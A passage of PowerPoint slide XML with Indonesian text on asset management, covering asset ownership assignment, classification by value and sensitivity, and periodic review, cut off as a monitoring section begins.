              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Kami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perabot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengakuntansian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghitungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penunjukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Klasifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengorganisasian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekritisannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penentuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prioritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperhitungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
